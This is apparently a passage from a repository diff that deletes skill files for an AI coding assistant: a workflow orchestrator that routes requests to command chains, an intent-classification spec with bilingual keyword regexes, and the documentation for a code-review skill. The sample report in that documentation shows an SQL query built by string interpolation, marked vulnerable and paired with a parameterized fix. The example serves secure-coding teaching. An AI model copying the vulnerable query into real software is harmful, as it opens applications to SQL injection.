│ └─ Mark first step as in_progress │
│ │
│ Phase 5: Execution Loop │
│ ├─ Execute current step (SlashCommand) │
│ ├─ Update TODO status (completed) │
│ ├─ Check auto_continue flag │
│ └─ Proceed to next step or wait for user │
│ │
└──────────────────────────────────────────────────────────────────┘
```
## Implementation
### Phase 1: Input Analysis
```javascript
// Load external configuration (externalized for flexibility)
const intentRules = JSON.parse(Read('.claude/skills/ccw/index/intent-rules.json'))
const capabilities = JSON.parse(Read('.claude/skills/ccw/index/command-capabilities.json'))
function analyzeInput(userInput) {
const input = userInput.trim()
// Check for explicit command passthrough
if (input.match(/^\/(?:workflow|issue|memory|task):/)) {
return { type: 'explicit', command: input, passthrough: true }
}
// Classify intent using external rules
const intent = classifyIntent(input, intentRules.intent_patterns)
// Assess complexity using external indicators
const complexity = assessComplexity(input, intentRules.complexity_indicators)
// Detect tool preferences using external triggers
const toolPreference = detectToolPreference(input, intentRules.cli_tool_triggers)
return {
type: 'natural',
text: input,
intent,
complexity,
toolPreference,
passthrough: false
}
}
function classifyIntent(text, patterns) {
// Sort by priority
const sorted = Object.entries(patterns)
.sort((a, b) => a[1].priority - b[1].priority)
for (const [intentType, config] of sorted) {
// Handle variants (bugfix, ui, docs)
if (config.variants) {
for (const [variant, variantConfig] of Object.entries(config.variants)) {
const variantPatterns = variantConfig.patterns || variantConfig.triggers || []
if (matchesAnyPattern(text, variantPatterns)) {
// For bugfix, check if standard patterns also match
if (intentType === 'bugfix') {
const standardMatch = matchesAnyPattern(text, config.variants.standard?.patterns || [])
if (standardMatch) {
return { type: intentType, variant, workflow: variantConfig.workflow }
}
} else {
return { type: intentType, variant, workflow: variantConfig.workflow }
}
}
}
// Check default variant
if (config.variants.standard) {
if (matchesAnyPattern(text, config.variants.standard.patterns)) {
return { type: intentType, variant: 'standard', workflow: config.variants.standard.workflow }
}
}
}
// Handle simple patterns (exploration, tdd, review)
if (config.patterns && !config.require_both) {
if (matchesAnyPattern(text, config.patterns)) {
return { type: intentType, workflow: config.workflow }
}
}
// Handle dual-pattern matching (issue_batch)
if (config.require_both && config.patterns) {
const matchBatch = matchesAnyPattern(text, config.patterns.batch_keywords)
const matchAction = matchesAnyPattern(text, config.patterns.action_keywords)
if (matchBatch && matchAction) {
return { type: intentType, workflow: config.workflow }
}
}
}
// Default to feature
return { type: 'feature' }
}
function matchesAnyPattern(text, patterns) {
if (!Array.isArray(patterns)) return false
const lowerText = text.toLowerCase()
return patterns.some(p => lowerText.includes(p.toLowerCase()))
}
function assessComplexity(text, indicators) {
let score = 0
for (const [level, config] of Object.entries(indicators)) {
if (config.patterns) {
for (const [category, patternConfig] of Object.entries(config.patterns)) {
if (matchesAnyPattern(text, patternConfig.keywords)) {
score += patternConfig.weight || 1
}
}
}
}
if (score >= indicators.high.score_threshold) return 'high'
if (score >= indicators.medium.score_threshold) return 'medium'
return 'low'
}
function detectToolPreference(text, triggers) {
for (const [tool, config] of Object.entries(triggers)) {
// Check explicit triggers
if (matchesAnyPattern(text, config.explicit)) return tool
// Check semantic triggers
if (matchesAnyPattern(text, config.semantic)) return tool
}
return null
}
```
### Phase 2: Chain Selection
```javascript
// Load workflow chains index
const chains = JSON.parse(Read('.claude/skills/ccw/index/workflow-chains.json'))
function selectChain(analysis) {
const { intent, complexity } = analysis
// Map intent type (from intent-rules.json) to chain ID (from workflow-chains.json)
const chainMapping = {
'bugfix': 'bugfix',
'issue_batch': 'issue', // intent-rules.json key → chains.json chain ID
'exploration': 'full',
'ui_design': 'ui', // intent-rules.json key → chains.json chain ID
'tdd': 'tdd',
'review': 'review-fix',
'documentation': 'docs', // intent-rules.json key → chains.json chain ID
'feature': null // Use complexity fallback
}
let chainId = chainMapping[intent.type]
// Fallback to complexity-based selection
if (!chainId) {
chainId = chains.chain_selection_rules.complexity_fallback[complexity]
}
const chain = chains.chains[chainId]
// Handle variants
let steps = chain.steps
if (chain.variants) {
const variant = intent.variant || Object.keys(chain.variants)[0]
steps = chain.variants[variant].steps
}
return {
id: chainId,
name: chain.name,
description: chain.description,
steps,
complexity: chain.complexity,
estimated_time: chain.estimated_time
}
}
```
### Phase 3: User Confirmation
```javascript
function confirmChain(selectedChain, analysis) {
// Skip confirmation for simple chains
if (selectedChain.steps.length <= 2 && analysis.complexity === 'low') {
return selectedChain
}
console.log(`
## CCW Workflow Selection
**Task**: ${analysis.text.substring(0, 80)}...
**Intent**: ${analysis.intent.type}${analysis.intent.variant ? ` (${analysis.intent.variant})` : ''}
**Complexity**: ${analysis.complexity}
**Selected Chain**: ${selectedChain.name}
**Description**: ${selectedChain.description}
**Estimated Time**: ${selectedChain.estimated_time}
**Steps**:
${selectedChain.steps.map((s, i) => `${i + 1}. ${s.command}${s.optional ? ' (optional)' : ''}`).join('\n')}
`)
const response = AskUserQuestion({
questions: [{
question: `Proceed with ${selectedChain.name}?`,
header: "Confirm",
multiSelect: false,
options: [
{ label: "Proceed", description: `Execute ${selectedChain.steps.length} steps` },
{ label: "Rapid", description: "Use lite-plan → lite-execute" },
{ label: "Full", description: "Use brainstorm → plan → execute" },
{ label: "Manual", description: "Specify commands manually" }
]
}]
})
// Handle alternative selection
if (response.Confirm === 'Rapid') {
return selectChain({ intent: { type: 'feature' }, complexity: 'low' })
}
if (response.Confirm === 'Full') {
return chains.chains['full']
}
if (response.Confirm === 'Manual') {
return null // User will specify
}
return selectedChain
}
```
### Phase 4: TODO Tracking Setup
```javascript
function setupTodoTracking(chain, analysis) {
const todos = chain.steps.map((step, index) => ({
content: `[${index + 1}/${chain.steps.length}] ${step.command}`,
status: index === 0 ? 'in_progress' : 'pending',
activeForm: `Executing ${step.command}`
}))
// Add header todo
todos.unshift({
content: `CCW: ${chain.name} (${chain.steps.length} steps)`,
status: 'in_progress',
activeForm: `Running ${chain.name} workflow`
})
TodoWrite({ todos })
return {
chain,
currentStep: 0,
todos
}
}
```
### Phase 5: Execution Loop
```javascript
async function executeChain(execution, analysis) {
const { chain, todos } = execution
let currentStep = 0
while (currentStep < chain.steps.length) {
const step = chain.steps[currentStep]
// Update TODO: mark current as in_progress
const updatedTodos = todos.map((t, i) => ({
...t,
status: i === 0
? 'in_progress'
: i === currentStep + 1
? 'in_progress'
: i <= currentStep
? 'completed'
: 'pending'
}))
TodoWrite({ todos: updatedTodos })
console.log(`\n### Step ${currentStep + 1}/${chain.steps.length}: ${step.command}\n`)
// Check for confirmation requirement
if (step.confirm_before) {
const proceed = AskUserQuestion({
questions: [{
question: `Ready to execute ${step.command}?`,
header: "Step",
multiSelect: false,
options: [
{ label: "Execute", description: "Run this step" },
{ label: "Skip", description: "Skip to next step" },
{ label: "Abort", description: "Stop workflow" }
]
}]
})
if (proceed.Step === 'Skip') {
currentStep++
continue
}
if (proceed.Step === 'Abort') {
break
}
}
// Execute the command
const args = analysis.text
SlashCommand(step.command, { args })
// Mark step as completed
updatedTodos[currentStep + 1].status = 'completed'
TodoWrite({ todos: updatedTodos })
currentStep++
// Check auto_continue
if (!step.auto_continue && currentStep < chain.steps.length) {
console.log(`
Step completed. Next: ${chain.steps[currentStep].command}
Type "continue" to proceed or specify different action.
`)
// Wait for user input before continuing
break
}
}
// Final status
if (currentStep >= chain.steps.length) {
const finalTodos = todos.map(t => ({ ...t, status: 'completed' }))
TodoWrite({ todos: finalTodos })
console.log(`\n${chain.name} workflow completed (${chain.steps.length} steps)`)
}
return { completed: currentStep, total: chain.steps.length }
}
```
## Main Orchestration Entry
```javascript
async function ccwOrchestrate(userInput) {
console.log('## CCW Orchestrator\n')
// Phase 1: Analyze input
const analysis = analyzeInput(userInput)
// Handle explicit command passthrough
if (analysis.passthrough) {
console.log(`Direct command: ${analysis.command}`)
return SlashCommand(analysis.command)
}
// Phase 2: Select chain
const selectedChain = selectChain(analysis)
// Phase 3: Confirm (for complex workflows)
const confirmedChain = confirmChain(selectedChain, analysis)
if (!confirmedChain) {
console.log('Manual mode selected. Specify commands directly.')
return
}
// Phase 4: Setup TODO tracking
const execution = setupTodoTracking(confirmedChain, analysis)
// Phase 5: Execute
const result = await executeChain(execution, analysis)
return result
}
```
## Decision Matrix
| Intent | Complexity | Chain | Steps |
|--------|------------|-------|-------|
| bugfix (standard) | * | bugfix | lite-fix |
| bugfix (hotfix) | * | bugfix | lite-fix --hotfix |
| issue | * | issue | plan → queue → execute |
| exploration | * | full | brainstorm → plan → execute |
| ui (explore) | * | ui | ui-design:explore → sync → plan → execute |
| ui (imitate) | * | ui | ui-design:imitate → sync → plan → execute |
| tdd | * | tdd | tdd-plan → execute → tdd-verify |
| review | * | review-fix | review-session-cycle → review-fix |
| docs | low | docs | update-related |
| docs | medium+ | docs | docs → execute |
| feature | low | rapid | lite-plan → lite-execute |
| feature | medium | coupled | plan → verify → execute |
| feature | high | full | brainstorm → plan → execute |
## Continuation Commands
After each step pause:
| User Input | Action |
|------------|--------|
| `continue` | Execute next step |
| `skip` | Skip current step |
| `abort` | Stop workflow |
| `/workflow:*` | Execute specific command |
| Natural language | Re-analyze and potentially switch chains |

View File

@@ -1,336 +0,0 @@
# Intent Classification Specification
CCW 意图分类规范:定义如何从用户输入识别任务意图并选择最优工作流。
## Classification Hierarchy
```
Intent Classification
├── Priority 1: Explicit Commands
│ └── /workflow:*, /issue:*, /memory:*, /task:*
├── Priority 2: Bug Keywords
│ ├── Hotfix: urgent + bug keywords
│ └── Standard: bug keywords only
├── Priority 3: Issue Batch
│ └── Multiple + fix keywords
├── Priority 4: Exploration
│ └── Uncertainty keywords
├── Priority 5: UI/Design
│ └── Visual/component keywords
└── Priority 6: Complexity Fallback
├── High → Coupled
├── Medium → Rapid
└── Low → Rapid
```
## Keyword Patterns
### Bug Detection
```javascript
const BUG_PATTERNS = {
core: /\b(fix|bug|error|issue|crash|broken|fail|wrong|incorrect|修复|报错|错误|问题|异常|崩溃|失败)\b/i,
urgency: /\b(hotfix|urgent|production|critical|emergency|asap|immediately|紧急|生产|线上|马上|立即)\b/i,
symptoms: /\b(not working|doesn't work|can't|cannot|won't|stopped|stopped working|无法|不能|不工作)\b/i,
errors: /\b(\d{3}\s*error|exception|stack\s*trace|undefined|null\s*pointer|timeout)\b/i
}
function detectBug(text) {
const isBug = BUG_PATTERNS.core.test(text) || BUG_PATTERNS.symptoms.test(text)
const isUrgent = BUG_PATTERNS.urgency.test(text)
const hasError = BUG_PATTERNS.errors.test(text)
if (!isBug && !hasError) return null
return {
type: 'bugfix',
mode: isUrgent ? 'hotfix' : 'standard',
confidence: (isBug && hasError) ? 'high' : 'medium'
}
}
```
### Issue Batch Detection
```javascript
const ISSUE_PATTERNS = {
batch: /\b(issues?|batch|queue|multiple|several|all|多个|批量|一系列|所有|这些)\b/i,
action: /\b(fix|resolve|handle|process|处理|解决|修复)\b/i,
source: /\b(github|jira|linear|backlog|todo|待办)\b/i
}
function detectIssueBatch(text) {
const hasBatch = ISSUE_PATTERNS.batch.test(text)
const hasAction = ISSUE_PATTERNS.action.test(text)
const hasSource = ISSUE_PATTERNS.source.test(text)
if (hasBatch && hasAction) {
return {
type: 'issue',
confidence: hasSource ? 'high' : 'medium'
}
}
return null
}
```
### Exploration Detection
```javascript
const EXPLORATION_PATTERNS = {
uncertainty: /\b(不确定|不知道|not sure|unsure|how to|怎么|如何|what if|should i|could i|是否应该)\b/i,
exploration: /\b(explore|research|investigate|分析|研究|调研|评估|探索|了解)\b/i,
options: /\b(options|alternatives|approaches|方案|选择|方向|可能性)\b/i,
questions: /\b(what|which|how|why|什么|哪个|怎样|为什么)\b.*\?/i
}
function detectExploration(text) {
const hasUncertainty = EXPLORATION_PATTERNS.uncertainty.test(text)
const hasExploration = EXPLORATION_PATTERNS.exploration.test(text)
const hasOptions = EXPLORATION_PATTERNS.options.test(text)
const hasQuestion = EXPLORATION_PATTERNS.questions.test(text)
const score = [hasUncertainty, hasExploration, hasOptions, hasQuestion].filter(Boolean).length
if (score >= 2 || hasUncertainty) {
return {
type: 'exploration',
confidence: score >= 3 ? 'high' : 'medium'
}
}
return null
}
```
### UI/Design Detection
```javascript
const UI_PATTERNS = {
components: /\b(ui|界面|component|组件|button|按钮|form|表单|modal|弹窗|dialog|对话框)\b/i,
design: /\b(design|设计|style|样式|layout|布局|theme|主题|color|颜色)\b/i,
visual: /\b(visual|视觉|animation|动画|responsive|响应式|mobile|移动端)\b/i,
frontend: /\b(frontend|前端|react|vue|angular|css|html|page|页面)\b/i
}
function detectUI(text) {
const hasComponents = UI_PATTERNS.components.test(text)
const hasDesign = UI_PATTERNS.design.test(text)
const hasVisual = UI_PATTERNS.visual.test(text)
const hasFrontend = UI_PATTERNS.frontend.test(text)
const score = [hasComponents, hasDesign, hasVisual, hasFrontend].filter(Boolean).length
if (score >= 2) {
return {
type: 'ui',
hasReference: /参考|reference|based on|像|like|模仿|imitate/.test(text),
confidence: score >= 3 ? 'high' : 'medium'
}
}
return null
}
```
## Complexity Assessment
### Indicators
```javascript
const COMPLEXITY_INDICATORS = {
high: {
patterns: [
/\b(refactor|重构|restructure|重新组织)\b/i,
/\b(migrate|迁移|upgrade|升级|convert|转换)\b/i,
/\b(architect|架构|system|系统|infrastructure|基础设施)\b/i,
/\b(entire|整个|complete|完整|all\s+modules?|所有模块)\b/i,
/\b(security|安全|scale|扩展|performance\s+critical|性能关键)\b/i,
/\b(distributed|分布式|microservice|微服务|cluster|集群)\b/i
],
weight: 2
},
medium: {
patterns: [
/\b(integrate|集成|connect|连接|link|链接)\b/i,
/\b(api|database|数据库|service|服务|endpoint|接口)\b/i,
/\b(test|测试|validate|验证|coverage|覆盖)\b/i,
/\b(multiple\s+files?|多个文件|several\s+components?|几个组件)\b/i,
/\b(authentication|认证|authorization|授权)\b/i
],
weight: 1
},
low: {
patterns: [
/\b(add|添加|create|创建|simple|简单)\b/i,
/\b(update|更新|modify|修改|change|改变)\b/i,
/\b(single|单个|one|一个|small|小)\b/i,
/\b(comment|注释|log|日志|print|打印)\b/i
],
weight: -1
}
}
function assessComplexity(text) {
let score = 0
for (const [level, config] of Object.entries(COMPLEXITY_INDICATORS)) {
for (const pattern of config.patterns) {
if (pattern.test(text)) {
score += config.weight
}
}
}
// File count indicator
const fileMatches = text.match(/\b\d+\s*(files?|文件)/i)
if (fileMatches) {
const count = parseInt(fileMatches[0])
if (count > 10) score += 2
else if (count > 5) score += 1
}
// Module count indicator
const moduleMatches = text.match(/\b\d+\s*(modules?|模块)/i)
if (moduleMatches) {
const count = parseInt(moduleMatches[0])
if (count > 3) score += 2
else if (count > 1) score += 1
}
if (score >= 4) return 'high'
if (score >= 2) return 'medium'
return 'low'
}
```
## Workflow Selection Matrix
| Intent | Complexity | Workflow | Commands |
|--------|------------|----------|----------|
| bugfix (hotfix) | * | bugfix | `lite-fix --hotfix` |
| bugfix (standard) | * | bugfix | `lite-fix` |
| issue | * | issue | `issue:plan → queue → execute` |
| exploration | * | full | `brainstorm → plan → execute` |
| ui (reference) | * | ui | `ui-design:imitate-auto → plan` |
| ui (explore) | * | ui | `ui-design:explore-auto → plan` |
| feature | high | coupled | `plan → verify → execute` |
| feature | medium | rapid | `lite-plan → lite-execute` |
| feature | low | rapid | `lite-plan → lite-execute` |
## Confidence Levels
| Level | Description | Action |
|-------|-------------|--------|
| **high** | Multiple strong indicators match | Direct dispatch |
| **medium** | Some indicators match | Confirm with user |
| **low** | Fallback classification | Always confirm |
## Tool Preference Detection
```javascript
const TOOL_PREFERENCES = {
gemini: {
pattern: /用\s*gemini|gemini\s*(分析|理解|设计)|让\s*gemini/i,
capability: 'analysis'
},
qwen: {
pattern: /用\s*qwen|qwen\s*(分析|评估)|让\s*qwen/i,
capability: 'analysis'
},
codex: {
pattern: /用\s*codex|codex\s*(实现|重构|修复)|让\s*codex/i,
capability: 'implementation'
}
}
function detectToolPreference(text) {
for (const [tool, config] of Object.entries(TOOL_PREFERENCES)) {
if (config.pattern.test(text)) {
return { tool, capability: config.capability }
}
}
return null
}
```
## Multi-Tool Collaboration Detection
```javascript
const COLLABORATION_PATTERNS = {
sequential: /先.*(分析|理解).*然后.*(实现|重构)|分析.*后.*实现/i,
parallel: /(同时|并行).*(分析|实现)|一边.*一边/i,
hybrid: /(分析|设计).*和.*(实现|测试).*分开/i
}
function detectCollaboration(text) {
if (COLLABORATION_PATTERNS.sequential.test(text)) {
return { mode: 'sequential', description: 'Analysis first, then implementation' }
}
if (COLLABORATION_PATTERNS.parallel.test(text)) {
return { mode: 'parallel', description: 'Concurrent analysis and implementation' }
}
if (COLLABORATION_PATTERNS.hybrid.test(text)) {
return { mode: 'hybrid', description: 'Mixed parallel and sequential' }
}
return null
}
```
## Classification Pipeline
```javascript
function classify(userInput) {
const text = userInput.trim()
// Step 1: Check explicit commands
if (/^\/(?:workflow|issue|memory|task):/.test(text)) {
return { type: 'explicit', command: text }
}
// Step 2: Priority-based classification
const bugResult = detectBug(text)
if (bugResult) return bugResult
const issueResult = detectIssueBatch(text)
if (issueResult) return issueResult
const explorationResult = detectExploration(text)
if (explorationResult) return explorationResult
const uiResult = detectUI(text)
if (uiResult) return uiResult
// Step 3: Complexity-based fallback
const complexity = assessComplexity(text)
return {
type: 'feature',
complexity,
workflow: complexity === 'high' ? 'coupled' : 'rapid',
confidence: 'low'
}
}
```
## Examples
### Input → Classification
| Input | Classification | Workflow |
|-------|----------------|----------|
| "用户登录失败401错误" | bugfix/standard | lite-fix |
| "紧急:支付网关挂了" | bugfix/hotfix | lite-fix --hotfix |
| "批量处理这些 GitHub issues" | issue | issue:plan → queue |
| "不确定要怎么设计缓存系统" | exploration | brainstorm → plan |
| "添加一个深色模式切换按钮" | ui | ui-design → plan |
| "重构整个认证模块" | feature/high | plan → verify |
| "添加用户头像功能" | feature/low | lite-plan |

View File

@@ -1,340 +0,0 @@
# Code Reviewer Skill
A comprehensive code review skill for identifying security vulnerabilities and best practices violations.
## Overview
The **code-reviewer** skill provides automated code review capabilities covering:
- **Security Analysis**: OWASP Top 10, CWE Top 25, language-specific vulnerabilities
- **Code Quality**: Naming conventions, complexity, duplication, dead code
- **Performance**: N+1 queries, inefficient algorithms, memory leaks
- **Maintainability**: Documentation, test coverage, dependency health
## Quick Start
### Basic Usage
```bash
# Review entire codebase
/code-reviewer
# Review specific directory
/code-reviewer --scope src/auth
# Focus on security only
/code-reviewer --focus security
# Focus on best practices only
/code-reviewer --focus best-practices
```
### Advanced Options
```bash
# Review with custom severity threshold
/code-reviewer --severity critical,high
# Review specific file types
/code-reviewer --languages typescript,python
# Generate detailed report
/code-reviewer --report-level detailed
# Resume from previous session
/code-reviewer --resume
```
## Features
### Security Analysis
**OWASP Top 10 2021 Coverage**
- Injection vulnerabilities (SQL, Command, XSS)
- Authentication & authorization flaws
- Sensitive data exposure
- Security misconfiguration
- And more...
**CWE Top 25 Coverage**
- Cross-site scripting (CWE-79)
- SQL injection (CWE-89)
- Command injection (CWE-78)
- Input validation (CWE-20)
- And more...
**Language-Specific Checks**
- JavaScript/TypeScript: prototype pollution, eval usage
- Python: pickle vulnerabilities, command injection
- Java: deserialization, XXE
- Go: race conditions, memory leaks
### Best Practices Review
**Code Quality**
- Naming convention compliance
- Cyclomatic complexity analysis
- Code duplication detection
- Dead code identification
**Performance**
- N+1 query detection
- Inefficient algorithm patterns
- Memory leak detection
- Resource cleanup verification
**Maintainability**
- Documentation coverage
- Test coverage analysis
- Dependency health check
- Error handling review
## Output
The skill generates comprehensive reports in `.code-review/` directory:
```
.code-review/
├── inventory.json # File inventory with metadata
├── security-findings.json # Security vulnerabilities
├── best-practices-findings.json # Best practices violations
├── summary.json # Summary statistics
├── REPORT.md # Comprehensive markdown report
└── FIX-CHECKLIST.md # Actionable fix checklist
```
### Report Contents
**REPORT.md** includes:
- Executive summary with risk assessment
- Quality scores (Security, Code Quality, Performance, Maintainability)
- Detailed findings organized by severity
- Code examples with fix recommendations
- Action plan prioritized by urgency
- Compliance status (PCI DSS, HIPAA, GDPR, SOC 2)
**FIX-CHECKLIST.md** provides:
- Checklist format for tracking fixes
- Organized by severity (Critical → Low)
- Effort estimates for each issue
- Priority assignments
## Configuration
Create `.code-reviewer.json` in project root:
```json
{
"scope": {
"include": ["src/**/*", "lib/**/*"],
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
},
"security": {
"enabled": true,
"checks": ["owasp-top-10", "cwe-top-25"],
"severity_threshold": "medium"
},
"best_practices": {
"enabled": true,
"code_quality": true,
"performance": true,
"maintainability": true
},
"reporting": {
"format": "markdown",
"output_path": ".code-review/",
"include_snippets": true,
"include_fixes": true
}
}
```
## Workflow
### Phase 1: Code Discovery
- Discover and categorize code files
- Extract metadata (LOC, complexity, framework)
- Prioritize files (Critical, High, Medium, Low)
### Phase 2: Security Analysis
- Scan for OWASP Top 10 vulnerabilities
- Check CWE Top 25 weaknesses
- Apply language-specific security patterns
- Generate security findings
### Phase 3: Best Practices Review
- Analyze code quality issues
- Detect performance problems
- Assess maintainability concerns
- Generate best practices findings
### Phase 4: Report Generation
- Consolidate all findings
- Calculate quality scores
- Generate comprehensive reports
- Create actionable checklists
## Integration
### Pre-commit Hook
Block commits with critical/high issues:
```bash
#!/bin/bash
# .git/hooks/pre-commit
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
ccw run code-reviewer --scope "$staged_files" --severity critical,high
if [ $? -ne 0 ]; then
echo "❌ Code review found critical/high issues. Commit aborted."
exit 1
fi
```
### CI/CD Integration
```yaml
# .github/workflows/code-review.yml
name: Code Review
on: [pull_request]
jobs:
review:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Code Review
run: |
ccw run code-reviewer --report-level detailed
ccw report upload .code-review/report.md
```
## Examples
### Example 1: Security-Focused Review
```bash
# Review authentication module for security issues
/code-reviewer --scope src/auth --focus security --severity critical,high
```
**Output**: Security findings with OWASP/CWE mappings and fix recommendations
### Example 2: Performance Review
```bash
# Review API endpoints for performance issues
/code-reviewer --scope src/api --focus best-practices --check performance
```
**Output**: N+1 queries, inefficient algorithms, memory leak detections
### Example 3: Full Project Audit
```bash
# Comprehensive review of entire codebase
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
```
**Output**: Complete audit with all findings, scores, and action plan
## Compliance Support
The skill maps findings to compliance requirements:
- **PCI DSS**: Requirement 6.5 (Common coding vulnerabilities)
- **HIPAA**: Technical safeguards and access controls
- **GDPR**: Article 32 (Security of processing)
- **SOC 2**: Security controls and monitoring
## Architecture
### Execution Mode
**Sequential** - Fixed phase order for systematic review:
1. Code Discovery → 2. Security Analysis → 3. Best Practices → 4. Report Generation
### Tools Used
- `mcp__ace-tool__search_context` - Semantic code search
- `mcp__ccw-tools__smart_search` - Pattern matching
- `Read` - File content access
- `Write` - Report generation
## Quality Standards
### Scoring System
```
Overall Score = (
Security Score × 0.4 +
Code Quality Score × 0.25 +
Performance Score × 0.2 +
Maintainability Score × 0.15
)
```
### Score Ranges
- **A (90-100)**: Excellent - Production ready
- **B (80-89)**: Good - Minor improvements needed
- **C (70-79)**: Acceptable - Some issues to address
- **D (60-69)**: Poor - Significant improvements required
- **F (0-59)**: Failing - Major issues, not production ready
## Troubleshooting
### Large Codebase
If review takes too long:
```bash
# Review in batches
/code-reviewer --scope src/module-1
/code-reviewer --scope src/module-2 --resume
# Or use parallel execution
/code-reviewer --parallel 4
```
### False Positives
Configure suppressions in `.code-reviewer.json`:
```json
{
"suppressions": {
"security": {
"sql-injection": {
"paths": ["src/legacy/**/*"],
"reason": "Legacy code, scheduled for refactor"
}
}
}
}
```
## File Structure
```
.claude/skills/code-reviewer/
├── SKILL.md # Main skill documentation
├── README.md # This file
├── phases/
│ ├── 01-code-discovery.md
│ ├── 02-security-analysis.md
│ ├── 03-best-practices-review.md
│ └── 04-report-generation.md
├── specs/
│ ├── security-requirements.md
│ ├── best-practices-requirements.md
│ └── quality-standards.md
└── templates/
├── security-finding.md
├── best-practice-finding.md
└── report-template.md
```
## Version
**v1.0.0** - Initial release
## License
MIT License

View File

@@ -1,308 +0,0 @@
---
name: code-reviewer
description: Comprehensive code review skill for identifying security vulnerabilities and best practices violations. Triggers on "code review", "review code", "security audit", "代码审查".
allowed-tools: Read, Glob, Grep, mcp__ace-tool__search_context, mcp__ccw-tools__smart_search
---
# Code Reviewer
Comprehensive code review skill for identifying security vulnerabilities and best practices violations.
## Architecture Overview
```
┌─────────────────────────────────────────────────────────────────┐
│ Code Reviewer Workflow │
├─────────────────────────────────────────────────────────────────┤
│ │
│ Phase 1: Code Discovery → 发现待审查的代码文件 │
│ & Scoping - 根据语言/框架识别文件 │
│ ↓ - 设置审查范围和优先级 │
│ │
│ Phase 2: Security → 安全漏洞扫描 │
│ Analysis - OWASP Top 10 检查 │
│ ↓ - 常见漏洞模式识别 │
│ - 敏感数据泄露检查 │
│ │
│ Phase 3: Best Practices → 最佳实践审查 │
│ Review - 代码质量检查 │
│ ↓ - 性能优化建议 │
│ - 可维护性评估 │
│ │
│ Phase 4: Report → 生成审查报告 │
│ Generation - 按严重程度分类问题 │
│ - 提供修复建议和示例 │
│ - 生成可追踪的修复清单 │
│ │
└─────────────────────────────────────────────────────────────────┘
```
## Features
### Security Analysis
- **OWASP Top 10 Coverage**
- Injection vulnerabilities (SQL, Command, LDAP)
- Authentication & authorization bypass
- Sensitive data exposure
- XML External Entities (XXE)
- Broken access control
- Security misconfiguration
- Cross-Site Scripting (XSS)
- Insecure deserialization
- Components with known vulnerabilities
- Insufficient logging & monitoring
- **Language-Specific Checks**
- JavaScript/TypeScript: prototype pollution, eval usage
- Python: pickle vulnerabilities, command injection
- Java: deserialization, path traversal
- Go: race conditions, memory leaks
### Best Practices Review
- **Code Quality**
- Naming conventions
- Function complexity (cyclomatic complexity)
- Code duplication
- Dead code detection
- **Performance**
- N+1 queries
- Inefficient algorithms
- Memory leaks
- Resource cleanup
- **Maintainability**
- Documentation quality
- Test coverage
- Error handling patterns
- Dependency management
## Usage
### Basic Review
```bash
# Review entire codebase
/code-reviewer
# Review specific directory
/code-reviewer --scope src/auth
# Focus on security only
/code-reviewer --focus security
# Focus on best practices only
/code-reviewer --focus best-practices
```
### Advanced Options
```bash
# Review with custom severity threshold
/code-reviewer --severity critical,high
# Review specific file types
/code-reviewer --languages typescript,python
# Generate detailed report with code snippets
/code-reviewer --report-level detailed
# Resume from previous session
/code-reviewer --resume
```
## Configuration
Create `.code-reviewer.json` in project root:
```json
{
"scope": {
"include": ["src/**/*", "lib/**/*"],
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
},
"security": {
"enabled": true,
"checks": ["owasp-top-10", "cwe-top-25"],
"severity_threshold": "medium"
},
"best_practices": {
"enabled": true,
"code_quality": true,
"performance": true,
"maintainability": true
},
"reporting": {
"format": "markdown",
"output_path": ".code-review/",
"include_snippets": true,
"include_fixes": true
}
}
```
## Output
### Review Report Structure
```markdown
# Code Review Report
## Executive Summary
- Total Issues: 42
- Critical: 3
- High: 8
- Medium: 15
- Low: 16
## Security Findings
### [CRITICAL] SQL Injection in User Query
**File**: src/auth/user-service.ts:145
**Issue**: Unsanitized user input in SQL query
**Fix**: Use parameterized queries
Code Snippet:
\`\`\`typescript
// ❌ Vulnerable
const query = `SELECT * FROM users WHERE username = '${username}'`;
// ✅ Fixed
const query = 'SELECT * FROM users WHERE username = ?';
db.execute(query, [username]);
\`\`\`
## Best Practices Findings
### [MEDIUM] High Cyclomatic Complexity
**File**: src/utils/validator.ts:78
**Issue**: Function has complexity score of 15 (threshold: 10)
**Fix**: Break into smaller functions
...
```
## Phase Documentation
| Phase | Description | Output |
|-------|-------------|--------|
| [01-code-discovery.md](phases/01-code-discovery.md) | Discover and categorize code files | File inventory with metadata |
| [02-security-analysis.md](phases/02-security-analysis.md) | Analyze security vulnerabilities | Security findings list |
| [03-best-practices-review.md](phases/03-best-practices-review.md) | Review code quality and practices | Best practices findings |
| [04-report-generation.md](phases/04-report-generation.md) | Generate comprehensive report | Markdown report |
## Specifications
- [specs/security-requirements.md](specs/security-requirements.md) - Security check specifications
- [specs/best-practices-requirements.md](specs/best-practices-requirements.md) - Best practices standards
- [specs/quality-standards.md](specs/quality-standards.md) - Overall quality standards
- [specs/severity-classification.md](specs/severity-classification.md) - Issue severity criteria
## Templates
- [templates/security-finding.md](templates/security-finding.md) - Security finding template
- [templates/best-practice-finding.md](templates/best-practice-finding.md) - Best practice finding template
- [templates/report-template.md](templates/report-template.md) - Final report template
## Integration with Development Workflow
### Pre-commit Hook
```bash
#!/bin/bash
# .git/hooks/pre-commit
# Run code review on staged files
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
ccw run code-reviewer --scope "$staged_files" --severity critical,high
if [ $? -ne 0 ]; then
echo "❌ Code review found critical/high issues. Commit aborted."
exit 1
fi
```
### CI/CD Integration
```yaml
# .github/workflows/code-review.yml
name: Code Review
on: [pull_request]
jobs:
review:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Run Code Review
run: |
ccw run code-reviewer --report-level detailed
ccw report upload .code-review/report.md
```
## Examples
### Example 1: Security-Focused Review
```bash
# Review authentication module for security issues
/code-reviewer --scope src/auth --focus security --severity critical,high
```
### Example 2: Performance Review
```bash
# Review API endpoints for performance issues
/code-reviewer --scope src/api --focus best-practices --check performance
```
### Example 3: Full Project Audit
```bash
# Comprehensive review of entire codebase
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
```
## Troubleshooting
### Large Codebase
If review takes too long:
```bash
# Review in batches
/code-reviewer --scope src/module-1
/code-reviewer --scope src/module-2 --resume
# Or use parallel execution
/code-reviewer --parallel 4
```
### False Positives
Configure suppressions in `.code-reviewer.json`:
```json
{
"suppressions": {
"security": {
"sql-injection": {
"paths": ["src/legacy/**/*"],
